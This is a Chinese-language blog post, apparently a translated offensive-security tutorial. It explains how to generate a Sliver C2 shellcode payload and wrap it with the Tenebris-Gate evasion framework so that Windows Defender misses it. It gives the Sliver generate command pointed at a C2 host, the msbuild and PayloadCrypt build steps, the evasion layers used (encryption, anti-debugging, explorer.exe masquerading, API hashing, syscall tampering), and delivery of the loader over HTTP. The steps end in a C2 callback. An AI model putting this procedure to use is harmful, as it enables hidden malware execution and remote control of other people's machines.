搜索

网络安全与渗透

规避杀毒软件:利用Tenebris-Gate绕过Windows Defender——黑客崛起

作者 大神K
2026年5月5日 2 分钟阅读
1

规避杀毒软件:利用Tenebris-Gate绕过Windows Defender

Tenebris-Gate 用于加密壳码并通过分层规避技术绕过检测。
Pasted image 20260505105544.png

欢迎回来,有志成为赛博战士的朋友们!

像密码器这样的规避工具世界本质上很脆弱。工具出现后,吸引关注,但一旦防守者了解它们的运作方式,它们的效用迅速丧失。如果你通过X或安全论坛的帖子发现了新的规避工具,很可能在你尝试时它已经被检测到了。这正是黑客与防守者之间猫捉老鼠游戏的演变方式。由于生命周期较短,大多数工具不值得深入分析,通常仅仅简要提及以提高公众意识。

然而,时不时会出现一种尚未被广泛讨论但仍然有效的工具。我们今天探讨的工具就属于这一类。截至撰写本文时,它仅公开发布两周,且一直保持低调。该工具名为Tenebris-Gate,本文将介绍其工作原理以及如何绕过Windows Defender以执行C2负载。

什么是特内布里斯-门

Tenebris-Gate 是一个多层规避框架,旨在保护和执行原始壳码,避免被检测。它通过一系列保护链处理**.bin** 有效载荷,每层针对不同类型的分析。它首先压缩和加密有效载荷,以去除可识别的模式,并隐藏其内容以防静态扫描。加密密钥本身采用HellShell IPv4编码伪装,使提取更为困难。随后,框架引入了反调试检查,并通过质数计算延迟执行,以干扰沙盒分析。

为了融入正常系统活动,Tenebris-Gate 将进程伪装为 explorer.exe ,并通过 Djb2 哈希解析 API 避免可疑导入。更深层次上,它通过篡改的系统调用绕过用户安全钩子,并仔细管理内存以避免触发RWX标志。

搭建

要使用 Tenebris-Gate,你需要一个合适的 Windows 开发环境。具体来说,你需要Visual Studio 2022或更新版本,以及桌面开发的C++工作负载和Windows SDK 10.0及以上版本。如果你使用的是较新的版本,比如 Visual Studio 2026 ,这些组件通常会一起安装。

我们这里不会详细讲解安装步骤,但一旦环境准备好,您就可以继续准备有效载荷。

武器化与加密

在满足前提条件后,第一步是生成一个原始的shellcode有效载荷。这可以用任何命令与控制框架实现,但我们会用Sliver来保持一致,尤其是如果你已经跟进了之前介绍过的材料。

要生成有效载荷,你可以在 Sliver 内执行以下命令:

sliver > generate –http C2-IP –skip-symbols –os windows –format shellcode –save /home/kali/
Pasted image 20260505105558.png

用 Sliver 生成有效载荷

这会产生一个壳码文件,之后将由Tenebris-Gate处理。生成后,将该**.bin** 文件传输到下载Tenebris-Gate框架的Windows电脑上。

在Windows系统上,打开Visual Studio的开发者PowerShell,导航到Tenebris-Gate目录。第一步是构建项目:

PS > msbuild SilentForge.sln /p:Configuration=Release /p:Platform=x64
Pasted image 20260505105604.png

项目构建完成后,您可以使用提供的工具加密有效载荷:

PS > .\Build\Release\PayloadCrypt.exe .\MANUAL_MANUFACTURER.bin Loader\
Pasted image 20260505105613.png

用Tenebris门加密负载以绕过Windows Defender

这一步将完整的规避流水线应用到你的shellcode上。加密过程完成后,你需要重建加载器,使其嵌入加密的有效载荷:

PS > msbuild SilentForge.sln /p:Configuration=Release /p:Platform=x64 /t:Loader
Pasted image 20260505105642.png

当这个过程完成后,你的最终执行文件将以 Loader.exe 的形式出现在 Build\Release 目录中。该文件包含完全混淆且受保护的有效载荷,准备交付。

交付

此时,有效载荷已加密并准备部署。传递方式完全取决于你所模拟的场景或渗透测试的目标。没有唯一正确的方法,因为不同的环境需要不同的策略。

为了演示,一个简单的方法是使用Python的HTTP服务器来托管有效载荷。这种方法常见于现实攻击中,黑客将工具和负载托管在远程服务器上,并通过内置系统工具获取。Windows原生二进制文件可能会被滥用来下载和执行此类负载。
当你下载 Loader.exe 文件时,你会注意到Windows Defender不会将其标记为恶意文件。
Pasted image 20260505105742.png

运行该可执行文件后,会建立回C2服务器的连接。
Pasted image 20260505105755.png

从那里,你可以用C2中所有可用的BOF互动访问目标系统。
Pasted image 20260505105802.png

摘要

躲避工具的世界在不断变化,而这些工具的有效性不会持续太久。在该领域的成功取决于你对恶意软件开发、操作系统内部结构和防御技术的理解。虽然研究像Tenebris-Gate这样的公共工具很有用,但仅靠它们是不够的。真正的自由来自于能够设计自己的技巧,并随着防御体系的演变快速适应。这类人在红队中通常备受尊敬,因为团队其他成员很大程度上依赖他们的工作。

这正是我们创建漏洞开发第二部分的原因。我们的目标是帮助您提升对高级攻击性安全技术的理解,使您不再受限于公共工具的短暂生命周期,而是能够自行创建工具。培训将于5月5日至7日UTC下午3点进行。该课程将上线并向 Subscribeer Pro 学生开放。

Collateral是一名前乌克兰武装部队网络专家,领导数字防御行动,现协助组织加强网络安全。

📌 版权声明

文章作者:大神K

原文链接:https://dashenk.com/2026/05/05/%e8%a7%84%e9%81%bf%e6%9d%80%e6%af%92%e8%bd%af%e4%bb%b6%ef%bc%9a%e5%88%a9%e7%94%a8tenebris-gate%e7%bb%95%e8%bf%87windows-defender-%e9%bb%91%e5%ae%a2%e5%b4%9b%e8%b5%b7/

版权说明:本文为原创内容,转载请注明出处。

标签:

作者

大神K

我是一个长期在技术与赚钱之间反复横跳的人。 做过网站、搞过SEO、写过程序,也踩过币圈的坑。 现在在做的事情很简单: 用 AI + 技术,把复杂的事情变简单,把一个人变成一支队伍。 这个网站,不是教程站,而是我的「操作记录」。 一个站长如何做 SEO 和流量 一个开发者如何用 AI 提高效率 一个交易者如何系统性构建赚钱模型 只讲能落地的方案,分享: 真实经验 + 踩过的坑 在这个时代,一个人,也可以是一家公司。

关注我
其他文章
一条评论

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注